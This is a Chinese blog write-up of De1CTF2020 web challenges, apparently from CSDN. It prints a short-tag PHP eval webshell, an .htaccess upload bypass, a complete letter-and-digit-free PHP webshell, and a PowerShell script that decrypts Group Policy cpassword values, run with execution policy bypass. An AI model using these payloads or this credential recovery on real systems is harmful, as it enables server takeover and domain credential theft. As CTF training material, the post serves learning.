De1CTF2020

于 2022-01-11 09:09:20 发布
阅读量502 收藏
点赞数
分类专栏: 内网 文章标签: php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/blue_fantasy/article/details/122423861
版权

check in

考点:文件上传过滤ph,短标签命令执行绕过,.htaccess攻击

知识点:<?=和<? echo等价,从PHP5.4.0后起<?=总是可用的

<?=eval($_POST[‘cmd’]);相当于<? echo eval($_POST[‘cmd’]);

抓包,随便上传了个马,发现存在内容黑名单

过滤了ph,尝试用短标签绕过本地测试了下,这样的短标签可以执行任意系统命令,system也可以

于是我们去选择构造如下的payload上传,让他直接执行命令 ,其中注意.htaccess中的php部分用换行绕过,同时修改Content-Type类型

最后访问得到flag

如果要getshell可以蚁剑连接的话上传<?=eval($_POST[‘cmd’]);

Hard_Pentest_1

考点: 短标签+无字母数字webshell+内网渗透

打开题目的源码如下:

<?php
//Clear the uploads directory every hour
highlight_file(__FILE__);
$sandbox = "uploads/". md5("De1CTF2020".$_SERVER['REMOTE_ADDR']);
@mkdir($sandbox);
@chdir($sandbox);

if($_POST["submit"]){
    if (($_FILES["file"]["size"] < 2048) && Check()){
        if ($_FILES["file"]["error"] > 0){
            die($_FILES["file"]["error"]);
        }
        else{
            $filename=md5($_SERVER['REMOTE_ADDR'])."_".$_FILES["file"]["name"];
            move_uploaded_file($_FILES["file"]["tmp_name"], $filename);
            echo "save in:" . $sandbox."/" . $filename;
        }
    }
    else{
        echo "Not Allow!";
    }
}

function Check(){
    $BlackExts = array("php");
    $ext = explode(".", $_FILES["file"]["name"]);
    $exts = trim(end($ext));
    $file_content = file_get_contents($_FILES["file"]["tmp_name"]);

    if(!preg_match('/[a-z0-9;~^`&|]/is',$file_content)  && 
        !in_array($exts, $BlackExts) && 
        !preg_match('/\.\./',$_FILES["file"]["name"])) {
          return true;
    }
    return false;
}
?>

<html>
<head>
<meta charset="utf-8">
<title>upload</title>
</head>
<body>

<form action="index.php" method="post" enctype="multipart/form-data">
    <input type="file" name="file" id="file"><br>
    <input type="submit" name="submit" value="submit">
</form>

</body>
</html>

代码过滤很简单:不允许php后缀,且文件内容不能存在数字和字母,php大小写就绕过了,无数字字母的webshell构造参看一些不包含数字和字母的webshell | 离别歌

<?=$_=[]?>
<?=$_=@"$_"?>
<?=$_=$_['!'=='@']?> 
<?=$___=$_?>
<?=$__=$_?>
<?=$__++?>
<?=$__++?>
<?=$__++?>
<?=$__++?>
<?=$__++?>
<?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$___.=$__?><?= $___.=$__?>
<?= $__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?>
<?= $___.=$__?>
<?=$__=$_?>
<?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?>
<?= $___.=$__?>
<?=$__=$_?>
<?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?>
<?= $___.=$__?>
<?=$____='_'?>
<?=$__=$_?>
<?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?>
<?=$____.=$__?>
<?=$__=$_?>
<?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?>
<?= $____.=$__?>
<?=$__=$_?>
<?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?>
<?= $____.=$__?>
<?=$__=$_?>
<?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?>
<?= $____.=$__?>
<?= $_=$$____?>
<?= $_[__]($_[_],$_[___])?>

上面这个脚本请仔细研究,很好理解。最后访问得到的路径去写一个马

蚁剑连接后发现是Windows环境,找到一个压缩包,导出,发现需要密码

根据提示继续进行内网渗透,查到域控192.168.0.12,该机器为192.168.0.11并属于De1CTF2020.lab域中

输入net use查看域中的共享连接

接下来参看大佬的Writeup学习到域渗透中SYSVOL还原组策略中保存的密码方法

参看:3gstudent-Blog

首先在每个域内都有一个共享的文件夹SYSVOL,路径为:\\<donain>\SYSVOL\,所有域内主机都能访问,里面保存组策略相关数据。因此进入该域中的共享文件夹

然后需要找到相应的策略组id的配置文件,路径为://De1CTF2020.lab/SYSVOL/De1CTF2020.lab/Policies/{B1248E1E-B97D-4C41-8EA4-1F2600F9264B}/Machine/Preferences/Groups/,如下是配置文件Groups.xml的内容

其中cpassword为AES加密的密码,有现成的解密脚本,改一下密码即可

function Get-DecryptedCpassword {
    [CmdletBinding()]
    Param(
        [string]$Cpassword
    )
    try{
    # Append appropriate padding based on string Length
    $Mod=($Cpassword.length % 4)
    
    switch($Mod){
    '1' {$Cpassword = $Cpassword.Substring(0,$Cpassword.Length-1)}
    '2' {$Cpassword += ('='*(4-$Mod))}
    '3' {$Cpassword += ('='*(4-$Mod))}
    }
    
    $Base64Decoded=[Convert]::FromBase64String($Cpassword)
    #Create a new AES.NET Crypto Object
    $AesObject=New-Object System.Security.Cryptography.AesCryptoServiceProvider
    [Byte[]] $AesKey = @(0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)
    
    #Set IV to all nulls to prevent dynamic generation of IV value
    $AesIV = New-Object Byte[]($Aesobject.IV.Length)
    $AesObject.IV=$AesIV
    $AesObject.Key=$Aeskey
    $DecryptorObject=$Aesobject.CreateDecryptor()
    [Byte[]] $OutBlock=$DecryptorObject.TransformFinalBlock($Base64Decoded,0,$Base64Decoded.length)
    
    return [System.Text.UnicodeEncoding]::Unicode.GetString($OutBlock)
    }
    
    catch {Write-Error $Error[0]}
}
Get-DecryptedCpassword "uYgjj9DCKSxqUp7gZfYzo0F6hOyiYh4VmYBXRAUp+08"//对应密文

保存为1.ps1上传,在虚拟终端运行:powershell -executionpolicy bypass -file 1.ps1,得到压缩包密码,打开得到flag1

blue_fantasy
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
De1CTF2020-Misc Easy Protocol
Renekt0n
05-04 1264
题目文件链接:easy-protocol 文件列表: 使用file命令查看hint文件 发现文件格式为cab文件,文件中包含一个名为hint.txt的文件,提取出hint文件查看内容 提示文件给出了flag的格式与提示,猜测三个数据包对应flag的三段。接下来使用wireshark依次打开三个数据包文件,一脸懵逼。 仔细查看part3文件,返现存在HTTP协议的数据包,过滤HTTP的包 从数据...
De1ctf 2020 -'Misc杂烩' writeup
汗的博客
05-06 789
一道很有意思的流量分析+NTFS隐写 文章目录描述文件地址hintwriteup 描述 文件地址 https://drive.google.com/file/d/1-SrQ8JbD8zAQNVlvuwu3T2Lbu_o1knRQ/view?usp=sharing hint writeup 下载文件,wireshark打开,看了下有很多post请求,文件-导出对象-http 然后会导出一堆文件,...
De1CTF_2020_wp_re_parser
0xDQ的博客
05-06 832
0x00 前言 先膜一下小组里的大师傅们,tql。 出题的师傅感觉也好nb。 先写re的其中的 parser . 0x01parser 这是一个用c++写的解释器,在动调的时候,很难看,后来看NuLL的wp说“⽤了⼀种新的动态绑定⽅式”。回头看看 先放到ida里看一眼,找到输入输入位置: 输入后加上“\n”,进行tokenize,进入sub_35F0: 很简单可以看...
De1CTF2020web复现(not done)
xlcvv的博客
05-05 413
check in calc 一、check in fuzz一下,php后缀类型的都不行,并且检测了上传文件的文件内容: 过滤了可以看到过滤了ph和>,可以通过短标签绕过,<?= ?>和<?php ?>是一样的,前者是短标签,后者是长标签: 然后上传.htaccess解析jpg,按平常写会检测到ph,可以通过换行拼接来bypass: 二、calc 题目给出...
De1ctf 2020 -'check in' writeup
汗的博客
05-06 1386
这道题很有意思,考察知识点:.htaccess文件上传、改文件type、字符匹配的绕过 文件内容过滤了很多字符 perl|pyth|ph|auto|curl|base|>|rm|ruby|openssl|war|lua|msf|xter|telnet in contents! 传jpg格式的shell <?=eval($_POST[123]); 传.htaccess文件,burp...
De1CTF2020De1CTF2020
02-18
De1CTF2020:一场技术的盛宴】 De1CTF2020是一场备受瞩目的网络安全竞赛,通常在CTF(Capture The Flag)领域内举办。CTF比赛是信息安全爱好者和专业人士展示技能、学习新知识并互相交流的平台。这种竞赛涵盖了多...
De1ctf 2020 -‘check in’ writeup
01-09
在CTF(Capture The Flag)竞赛中,"De1ctf 2020 - ‘check in’" 是一道挑战性的安全题目,主要涉及到多个网络安全技术的综合运用,特别是与Web应用程序安全相关的方面。该题目的核心是通过理解并利用服务器配置中...
De1CTF.zip
07-20
De1CTF逆向 pwn等,除web,misc外均有
DE1_CAMERA
04-15
DE1_CAMERA项目主要涉及到FPGA(Field-Programmable Gate Array)技术,它是一种可编程逻辑器件,允许用户根据需求自定义硬件逻辑。在本项目中,DE1平台被用作核心处理单元,用于实现摄像头图像数据的采集、处理和...
DE1-soc 内部资料
03-10
DE1-SOC是一款基于 Altera 公司 FPGA(Field Programmable Gate Array)芯片的开发板,主要用于教育、学习和实验目的。它集成了多种硬件模块和接口,为用户提供了丰富的功能,可以进行数字逻辑设计、嵌入式系统开发...
dds.rar_de1
09-24
【dds.rar_de1】是一个压缩包文件,其中包含与DE1开发板相关的VHDL程序。DE1(Digital Education 1)是Altera公司推出的一款教育用FPGA(Field-Programmable Gate Array)开发板,广泛应用于数字逻辑设计的教学和...
writeup:CTF挑战撰写
05-28
欢迎阅读我们的文章! 自2018年以来,r3kapig是一个统一的CTF团队,主要来自Eur3kA和... :2020 de1ctf写入 :0CTF / TCTF 2020质量报告 :GeekPwn云上挑战赛 20201020-n1ctf :N1CTF 2020撰写 20210111-rwctf-
DE1.rar_assignment_de1
07-15
de1 board pin assignment
友晶DE1培训资料
04-18
《友晶DE1 soc开发教程全面解析》 在嵌入式系统的世界中,Altera的DE1开发板因其丰富的功能和强大的性能而受到广大开发者喜爱。DE1开发板以其集成的System-on-Chip (SOC)为核心,为学习和实践数字电子技术提供了...
HW.rar_DE1开发板图片_de1
09-24
DE1开发板是一款基于 Altera 公司Cyclone系列 FPGA 的强大开发工具,常用于教育、科研以及原型设计等领域。这个"HW.rar_DE1开发板图片_de1"压缩包内容可能包含了与DE1开发板相关的图像资料和可能的源代码,特别是与...
De1CTF2020--WEB--check in
a965527596的博客
06-24 475
check in 第一步 打开题目上传一句话,发现有后缀检测和MIME类型检测,不能 上传php文件,而且有内容检测,内容中不能出现下列字符,尝试上传.htaccess。 第二步 因为检测内容中不能出现php,所以使用换行拼接。上传内容为 接下来上传一句话,同理不能出现php,利用短标签来绕过,从PHP5.4.0起<?=和<?php是一样的 使用蚁...
De1CTF Weapon(IO_2_1_stdout)
Maxmalloc的博客
08-05 1129
1.保护机制 [*] '/home/yzl/Documents/delta/weapon/pwn' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE e...
2020CTF笔记crypto部分
热门推荐
Love&Share
04-02 1万+
准备工作 安装python2、3共存环境 1.检查环境变量,缺少的我们需要添加。先找到环境变量的位置。 在Path环境变量中检查以下4个变量(Path中的环境变量是以分号隔开的): 1.c:\Python27 2.c:\Python27\Scripts 3.c:\Python33 4.c:\Python33\Scripts 少哪个加哪个,注意分号隔开。 2.然后进入Python2.7安装目录找到如...
de1ctf 部分writeup解析
zhang14916的博客
05-09 1776
1.NLFSR: 在ctf-wiki中我们可以找到一种对NLFDSR的攻击方法——https://wiki.x10sec.org/crypto/streamcipher/fsr/nfsr/。由于对多个LFSR组合时不能实现均匀混合吗,我们可以发现有的值和最后结果相近,我们可以据此对NLFSR中的部分LFSR进行爆破。最后我们可以对剩下的LFSR进行爆破。首先我们可以根据多个LFSR组合判断哪些LF...
[de1ctf 2019]ssrf me 1
最新发布
03-16
[de1ctf 2019]ssrf me 1 是一道关于SSRF的题目。它的目标是通过利用SSRF漏洞,访问位于内部网络中的一个HTTP服务,从而获取flag。 具体来说,题目中提供了一个Web应用程序,该应用程序允许用户输入一个URL,然后...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值